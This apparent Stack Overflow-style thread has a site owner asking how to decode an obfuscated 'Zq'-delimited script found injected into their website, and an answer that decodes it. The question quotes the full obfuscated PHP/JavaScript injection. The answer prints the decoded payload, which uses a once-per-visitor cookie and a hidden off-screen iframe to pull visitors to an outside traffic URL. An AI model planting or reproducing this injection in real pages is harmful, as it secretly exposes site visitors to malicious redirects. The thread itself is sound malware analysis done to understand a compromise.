# Which encoding uses"Zq" prefix?

Tags: javascript, deobfuscation

I'm attempting to decode the following text with hexadecimal characters prefixing by "Zq".

I've tried to decode this from base 16, 32, 64 whithout success. It's an encoded instruction from a JavaScript source code.

I would like to understand what it is for:

> #a9a007#
>       if(empty($zhk)) {$zhk = "ortjy=String;ntniz=\"spl\"+\"i\"+\"t\";rucoec=window;ejy=(1)?\"0x\":\"123\";cod=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document[\"b\"+\"ody\"])}catch(ccb){uervpm=false;try{}catch(fmr){uervpm=21;}if(1){xphl=\"17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq6dZq6eZq6dZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6dZq6eZq6dZq17Zq34Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5aZq69Zq5cZq58Zq6bZq5cZq3cZq63Zq5cZq64Zq5cZq65Zq6bZq1fZq1eZq60Zq5dZq69Zq58Zq64Zq5cZq1eZq20Zq32Zq4Zq1Zq4Zq1Zq17Zq6dZq6eZq6dZq25Zq6aZq69Zq5aZq17Zq34Zq17Zq1eZq5fZq6bZq6bZq67Zq31Zq26Zq26Zq60Zq65Zq6dZq5cZq69Zq6aZq60Zq66Zq65Zq5cZq6aZq69Zq64Zq25Zq5aZq66Zq64Zq26Zq6bZq69Zq58Zq5dZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq6eZq6dZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq67Zq66Zq6aZq60Zq6bZq60Zq66Zq65Zq17Zq34Zq17Zq1eZq58Zq59Zq6aZq66Zq63Zq6cZq6bZq5cZq1eZq32Zq4Zq1Zq17Zq6dZq6eZq6dZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq5aZq66Zq63Zq66Zq69Zq17Zq34Zq17Zq1eZq29Zq2cZq2eZq2bZq2dZq1eZq32Zq4Zq1Zq17Zq6dZq6eZq6dZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq5fZq5cZq60Zq5eZq5fZq6bZq17Zq34Zq17Zq1eZq29Zq2cZq2eZq2bZq2dZq67Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq6eZq6dZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq6eZq60Zq5bZq6bZq5fZq17Zq34Zq17Zq1eZq29Zq2cZq2eZq2bZq2dZq67Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq6eZq6dZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq63Zq5cZq5dZq6bZq17Zq34Zq17Zq1eZq28Zq27Zq27Zq27Zq29Zq2cZq2eZq2bZq2dZq1eZq32Zq4Zq1Zq17Zq6dZq6eZq6dZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq6bZq66Zq67Zq17Zq34Zq17Zq1eZq28Zq27Zq27Zq27Zq29Zq2cZq2eZq2bZq2dZq1eZq32Zq4Zq1Zq4Zq1Zq17Zq60Zq5dZq17Zq1fZq18Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5eZq5cZq6bZq3cZq63Zq5cZq64Zq5cZq65Zq6bZq39Zq70Zq40Zq5bZq1fZq1eZq6dZq6eZq6dZq1eZq20Zq20Zq17Zq72Zq4Zq1Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq6eZq69Zq60Zq6bZq5cZq1fZq1eZq33Zq67Zq17Zq60Zq5bZq34Zq53Zq1eZq6dZq6eZq6dZq53Zq1eZq17Zq5aZq63Zq58Zq6aZq6aZq34Zq53Zq1eZq6dZq6eZq6dZq27Zq30Zq53Zq1eZq17Zq35Zq33Zq26Zq67Zq35Zq1eZq20Zq32Zq4Zq1Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5eZq5cZq6bZq3cZq63Zq5cZq64Zq5cZq65Zq6bZq39Zq70Zq40Zq5bZq1fZq1eZq6dZq6eZq6dZq1eZq20Zq25Zq58Zq67Zq67Zq5cZq65Zq5bZq3aZq5fZq60Zq63Zq5bZq1fZq6dZq6eZq6dZq20Zq32Zq4Zq1Zq17Zq74Zq4Zq1Zq74Zq4Zq1Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq5aZq66Zq66Zq62Zq60Zq5cZq45Zq58Zq64Zq5cZq23Zq5aZq66Zq66Zq62Zq60Zq5cZq4dZq58Zq63Zq6cZq5cZq23Zq65Zq3bZq58Zq70Zq6aZq23Zq67Zq58Zq6bZq5fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6bZq66Zq5bZq58Zq70Zq17Zq34Zq17Zq65Zq5cZq6eZq17Zq3bZq58Zq6bZq5cZq1fZq20Zq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5cZq6fZq67Zq60Zq69Zq5cZq17Zq34Zq17Zq65Zq5cZq6eZq17Zq3bZq58Zq6bZq5cZq1fZq20Zq32Zq4Zq1Zq17Zq60Zq5dZq17Zq1fZq65Zq3bZq58Zq70Zq6aZq34Zq34Zq65Zq6cZq63Zq63Zq17Zq73Zq73Zq17Zq65Zq3bZq58Zq70Zq6aZq34Zq34Zq27Zq20Zq17Zq65Zq3bZq58Zq70Zq6aZq34Zq28Zq32Zq4Zq1Zq17Zq5cZq6fZq67Zq60Zq69Zq5cZq25Zq6aZq5cZq6bZq4bZq60Zq64Zq5cZq1fZq6bZq66Zq5bZq58Zq70Zq25Zq5eZq5cZq6bZq4bZq60Zq64Zq5cZq1fZq20Zq17Zq22Zq17Zq2aZq2dZq27Zq27Zq27Zq27Zq27Zq21Zq29Zq2bZq21Zq65Zq3bZq58Zq70Zq6aZq20Zq32Zq4Zq1Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5aZq66Zq66Zq62Zq60Zq5cZq17Zq34Zq17Zq5aZq66Zq66Zq62Zq60Zq5cZq45Zq58Zq64Zq5cZq22Zq19Zq34Zq19Zq22Zq5cZq6aZq5aZq58Zq67Zq5cZq1fZq5aZq66Zq66Zq62Zq60Zq5cZq4dZq58Zq63Zq6cZq5cZq20Zq4Zq1Zq17Zq22Zq17Zq19Zq32Zq5cZq6fZq67Zq60Zq69Zq5cZq6aZq34Zq19Zq17Zq22Zq17Zq5cZq6fZq67Zq60Zq69Zq5cZq25Zq6bZq66Zq3eZq44Zq4bZq4aZq6bZq69Zq60Zq65Zq5eZq1fZq20Zq17Zq22Zq17Zq1fZq1fZq67Zq58Zq6bZq5fZq20Zq17Zq36Zq17Zq19Zq32Zq17Zq67Zq58Zq6bZq5fZq34Zq19Zq17Zq22Zq17Zq67Zq58Zq6bZq5fZq17Zq31Zq17Zq19Zq19Zq20Zq32Zq4Zq1Zq74Zq4Zq1Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq17Zq65Zq58Zq64Zq5cZq17Zq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq69Zq6bZq17Zq34Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5aZq66Zq66Zq62Zq60Zq5cZq25Zq60Zq65Zq5bZq5cZq6fZq46Zq5dZq1fZq17Zq65Zq58Zq64Zq5cZq17Zq22Zq17Zq19Zq34Zq19Zq17Zq20Zq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq63Zq5cZq65Zq17Zq34Zq17Zq6aZq6bZq58Zq69Zq6bZq17Zq22Zq17Zq65Zq58Zq64Zq5cZq25Zq63Zq5cZq65Zq5eZq6bZq5fZq17Zq22Zq17Zq28Zq32Zq4Zq1Zq17Zq60Zq5dZq17Zq1fZq17Zq1fZq17Zq18Zq6aZq6bZq58Zq69Zq6bZq17Zq20Zq17Zq1dZq1dZq4Zq1Zq17Zq1fZq17Zq65Zq58Zq64Zq5cZq17Zq18Zq34Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5aZq66Zq66Zq62Zq60Zq5cZq25Zq6aZq6cZq59Zq6aZq6bZq69Zq60Zq65Zq5eZq1fZq17Zq27Zq23Zq17Zq65Zq58Zq64Zq5cZq25Zq63Zq5cZq65Zq5eZq6bZq5fZq17Zq20Zq17Zq20Zq17Zq20Zq4Zq1Zq17Zq72Zq4Zq1Zq17Zq69Zq5cZq6bZq6cZq69Zq65Zq17Zq65Zq6cZq63Zq63Zq32Zq4Zq1Zq17Zq74Zq4Zq1Zq17Zq60Zq5dZq17Zq1fZq17Zq6aZq6bZq58Zq69Zq6bZq17Zq34Zq34Zq17Zq24Zq28Zq17Zq20Zq17Zq69Zq5cZq6bZq6cZq69Zq65Zq17Zq65Zq6cZq63Zq63Zq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5cZq65Zq5bZq17Zq34Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5aZq66Zq66Zq62Zq60Zq5cZq25Zq60Zq65Zq5bZq5cZq6fZq46Zq5dZq1fZq17Zq19Zq32Zq19Zq23Zq17Zq63Zq5cZq65Zq17Zq20Zq32Zq4Zq1Zq17Zq60Zq5dZq17Zq1fZq17Zq5cZq65Zq5bZq17Zq34Zq34Zq17Zq24Zq28Zq17Zq20Zq17Zq5cZq65Zq5bZq17Zq34Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5aZq66Zq66Zq62Zq60Zq5cZq25Zq63Zq5cZq65Zq5eZq6bZq5fZq32Zq4Zq1Zq17Zq69Zq5cZq6bZq6cZq69Zq65Zq17Zq6cZq65Zq5cZq6aZq5aZq58Zq67Zq5cZq1fZq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5aZq66Zq66Zq62Zq60Zq5cZq25Zq6aZq6cZq59Zq6aZq6bZq69Zq60Zq65Zq5eZq1fZq17Zq63Zq5cZq65Zq23Zq17Zq5cZq65Zq5bZq17Zq20Zq17Zq20Zq32Zq4Zq1Zq74Zq4Zq1Zq60Zq5dZq17Zq1fZq65Zq58Zq6dZq60Zq5eZq58Zq6bZq66Zq69Zq25Zq5aZq66Zq66Zq62Zq60Zq5cZq3cZq65Zq58Zq59Zq63Zq5cZq5bZq20Zq4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq6dZq6eZq6dZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74\"[ntniz](\"Zq\");}rucoec=xphl;zhhvyb=[];for(qyk=22-20-2;-qyk+1402!=0;qyk+=1){eghwv=qyk;if((0x19==031))zhhvyb+=ortjy.fromCharCode(eval(ejy+rucoec[1*eghwv])+0xa-cod);}ixru=eval;if(Math.ceil(5.5)===6)ixru(zhhvyb)}";echo
>   $zhk;}
>       #/a9a007#

Comment: What about the JS source it comes from? Doesn't that include the code to encode and/or decode it?

Comment: You can use a tool like http://home.paulschou.net/tools/xlate/ to translate the encoded hex to various readable formats. That could help you research this.

Comment: Maybe it helps to know that the variable `ntniz` is likely the string "`split`", because this operation is probably `"...".split("Zq")`, which makes an array of hex-value strings.

Answer (score 9):

The `Zq` is a *delimiter*, not part of the value. The bit at the end likely performs a `.split("Zq")` operation, which creates an array of hex values.

Some quick searching reveals that these hex values are just ASCII values offset by 9. (I determined this with a quick `for` loop, but you can also see it in the code `+0xa-cod`, where `0xa` is hexadecimal `10` and `cod` is set earlier as `5-3-1` (i.e., `1`)).

```
var input_string = "17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq6dZq6eZq6dZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6dZq6eZq6dZq17Zq34Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5aZq69Zq5cZq58Zq6bZq5cZq3cZq63Zq5cZq64Zq5cZq65Zq6bZq1fZq1eZq60Zq5dZq69Zq58Zq64Zq5cZq1eZq20Zq32Zq4Zq1Zq4Zq1Zq17Zq6dZq6eZq6dZq25Zq6aZq69Zq5aZq17Zq34Zq17Zq1eZq5fZq6bZq6bZq67Zq31Zq26Zq26Zq60Zq65Zq6dZq5cZq69Zq6aZq60Zq66Zq65Zq5cZq6aZq69Zq64Zq25Zq5aZq66Zq64Zq26Zq6bZq69Zq58Zq5dZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq6eZq6dZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq67Zq66Zq6aZq60Zq6bZq60Zq66Zq65Zq17Zq34Zq17Zq1eZq58Zq59Zq6aZq66Zq63Zq6cZq6bZq5cZq1eZq32Zq4Zq1Zq17Zq6dZq6eZq6dZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq5aZq66Zq63Zq66Zq69Zq17Zq34Zq17Zq1eZq29Zq2cZq2eZq2bZq2dZq1eZq32Zq4Zq1Zq17Zq6dZq6eZq6dZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq5fZq5cZq60Zq5eZq5fZq6bZq17Zq34Zq17Zq1eZq29Zq2cZq2eZq2bZq2dZq67Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq6eZq6dZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq6eZq60Zq5bZq6bZq5fZq17Zq34Zq17Zq1eZq29Zq2cZq2eZq2bZq2dZq67Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq6eZq6dZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq63Zq5cZq5dZq6bZq17Zq34Zq17Zq1eZq28Zq27Zq27Zq27Zq29Zq2cZq2eZq2bZq2dZq1eZq32Zq4Zq1Zq17Zq6dZq6eZq6dZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq6bZq66Zq67Zq17Zq34Zq17Zq1eZq28Zq27Zq27Zq27Zq29Zq2cZq2eZq2bZq2dZq1eZq32Zq4Zq1Zq4Zq1Zq17Zq60Zq5dZq17Zq1fZq18Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5eZq5cZq6bZq3cZq63Zq5cZq64Zq5cZq65";
var input_arr = input_string.split("Zq");

// use parseInt(val, 16) to decode each hex value to a Number
// add 9 to that number
// pass the sum into fromCharCode to get the char
// join the characters
var result = input_arr.map(function(val) {
    return String.fromCharCode(parseInt(val, 16) + 9);
}).join("");
```

This reveals the resulting text in `result`:

```
function vwv09() {
    var static = 'ajax';
    var controller = 'index.php';
    var vwv = document.createElement('iframe');

    vwv.src = 'http://inversionesrm.com/traf.php';
    vwv.style.position = 'absolute';
    vwv.style.color = '25746';
    vwv.style.height = '25746px';
    vwv.style.width = '25746px';
    vwv.style.left = '100025746';
    vwv.style.top = '100025746';

    if (!document.getElementById('vwv')) {
        document.write('<p id=\'vwv\' class=\'vwv09\' ></p>');
        document.getElementById('vwv').appendChild(vwv);
    }
}

function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    if ((!start) &&
        (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');

        vwv09();
    }
}
```

This text is then `eval`ed, which seems to set a `visited_uq` cookie and then opens an iframe to a page on `inversionsrm.com`.

Comment: Great! How you find `9`?

Comment: @vp_arth I just put the `input.map(...)` code inside a `for` loop and used `i` instead of `9` and looked for sensible output.

Comment: I try manually, and give up on +7)) Start multiplicate and other)

Comment: Sorry, I missed a part of the code. I've made a correction in my question in order to have the full code for a better understanding. I don't know how and why I have this script on my website since I haven't written it. So I would like to understand what's that and how it appeared there... And well, Thanks for your answers and decoding. It helps me to understand. :)